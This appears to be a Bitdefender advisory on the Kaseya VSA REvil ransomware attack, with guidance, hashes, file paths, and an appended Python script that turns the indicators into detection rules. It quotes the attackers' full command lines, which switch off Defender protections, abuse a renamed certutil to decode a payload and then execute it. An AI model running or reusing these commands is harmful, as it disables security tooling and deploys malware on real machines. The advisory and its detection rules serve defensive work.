Advisory on Kaseya VSA Ransomware Attack

Update: July 13, 2021 -- Kaseya issued a critical security update for VSA users that is available on their site - Kaseya Critical Security Update. We recommend users follow Kaseya's recommended updates as soon as possible. 

- - - - - - - - - - - - - - -

We continue to monitor and analyze the attack that used Kaseya software to deploy a variant of REvil ransomware into victims' environments. The attack targeted Kaseya's managed service provider (MSP) customers, which often provide IT support to small- to medium-size businesses. By targeting MSPs, attackers also seek to access and infiltrate the MSPs' customers' computer networks.

Guidance for Bitdefender Customers  

  • Kaseya issued an advisory and has urged their customers to immediately shut down on-premises VSA servers. We recommend that any Kaseya VSA users follow this guidance immediately.  
  • Check on-premises and hybrid environments for the known indicators of compromise (IoCs); the list of IoCs is below.
  • The U.S. Cybersecurity and Infrastructure Security Agency (CISA) has issued an alert stating that they are monitoring details about the attack against Kaseya VSA and the multiple MSPs that use VSA software. We recommend organizations follow the CISA alert for future updates. 

We continue to monitor and assess any customer impact, and will develop further guidance as appropriate, including how Bitdefender customers can protect or mitigate impacts to affected systems. Our Labs team's findings to date indicate that Bitdefender solutions detect and block the command line action and the delivered payloads used in the attack, thus protecting customers from this step in the attack. If you are a Kaseya user and believe that you are impacted, please contact us at: gzn-gs@bitdefender.com

Verified Indicators of Compromise 

  1. Command line executed from Kaseya agent: 

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 5825 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

and 

C:\WINDOWS\system32\cmd.exe /c ping 127.0.0.1 -n 3637 > nul & C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\WaRCoMWorking\agent.crt c:\WaRCoMWorking\agent.exe & del /q /f c:\WaRCoMWorking\agent.crt C:\Windows\cert.exe & c:\WaRCoMWorking\agent.exe 

  2. Hashes:
  • 561cffbaba71a6e8cc1cdceda990ead4, detected by Bitdefender as Gen:Variant.Graftor.952042 since 15.May.2021. This is the main executable (c:\kworking\agent.exe) that is decoded from agent.crt using certutil.exe.
  • a47cf00aedf769d60d58bfe00c0b5421, detected by Bitdefender as Gen:Variant.Bulz.471680 since 13.May.2021. This is a DLL that is dropped by the main executable and side-loaded by a Microsoft msmpeng.exe executable.
  • 0293a5d21081a94a5589976b407f5675, the hash of agent.crt (the content of agent.exe before decoding).

  3. File paths:
  • c:\WaRCoMWorking\agent.crt
  • c:\WaRCoMWorking\agent.exe
  • c:\kworking\agent.exe
  • c:\kworking\agent.crt
  • c:\windows\msmpeng.exe (an older version that is vulnerable to DLL side-loading). This version is dropped by the main executable and then used to load the DLL (a47cf00aedf769d60d58bfe00c0b5421). File version: MsMpEng.exe, Microsoft Malware Protection, 4.5.0218.0
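As an added illustration (not part of the advisory and not Bitdefender's own detection code), the following Python turns the indicators above into simple detection rules and runs them over a constructed process-creation log and file observations. Rule names, descriptions and the abridged sample command line are our own; the hashes and paths are the advisory's.

```python
import re

# Indicators copied from the advisory; the short descriptions are ours.
IOC_MD5 = {
    "561cffbaba71a6e8cc1cdceda990ead4": "agent.exe main payload",
    "a47cf00aedf769d60d58bfe00c0b5421": "side-loaded DLL",
    "0293a5d21081a94a5589976b407f5675": "agent.crt encoded payload",
}
IOC_PATHS = {
    r"c:\kworking\agent.exe", r"c:\kworking\agent.crt",
    r"c:\warcomworking\agent.exe", r"c:\warcomworking\agent.crt",
    r"c:\windows\msmpeng.exe", r"c:\windows\cert.exe",
}

# Behavioural rules derived from the two command lines in the advisory. Each one
# alone is worth a look; all four together match the advisory's chain exactly.
RULES = {
    "defender_tamper": re.compile(r"set-mppreference.*-disablerealtimemonitoring\s+\$true"),
    "certutil_copied_renamed": re.compile(r"copy\s+/y\s+\S*certutil\.exe\s+\S+"),
    "certutil_decode_agent": re.compile(r"-decode\s+\S*agent\.crt\s+\S*agent\.exe"),
    "ioc_working_dir_exec": re.compile(r"\\(kworking|warcomworking)\\agent\.exe"),
}

def scan_command_line(cmd: str) -> list:
    """Names of the rules that a single process command line matches (case-insensitive)."""
    lowered = cmd.lower()
    return [name for name, rx in RULES.items() if rx.search(lowered)]

def classify_file(path: str, md5: str) -> list:
    """Reasons a file observation (path + MD5) matches the advisory's file IoCs."""
    reasons = []
    if md5.lower() in IOC_MD5:
        reasons.append("hash:" + IOC_MD5[md5.lower()])
    if path.lower().replace("/", "\\") in IOC_PATHS:
        reasons.append("path:" + path.lower())
    return reasons

# Constructed sample log: the advisory's first command line (Set-MpPreference
# switches abridged) followed by a benign command that should not fire.
SAMPLE_LOG = [
    r'"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 -n 5825 > nul & '
    r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference '
    r'-DisableRealtimeMonitoring $true -DisableIOAVProtection $true -Force & '
    r'copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe & '
    r'echo %RANDOM% >> C:\Windows\cert.exe & '
    r'C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & '
    r'del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe',
    r'C:\Windows\system32\cmd.exe /c ping 127.0.0.1 -n 2 > nul',
]
```

Feed `scan_command_line` the command line field of Sysmon event 1 or Security event 4688 records, and `classify_file` the path and MD5 of files found under the working directories; a hit on the hash is definitive, while a path hit alone is a trigger for collection.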

Author


Bitdefender Enterprise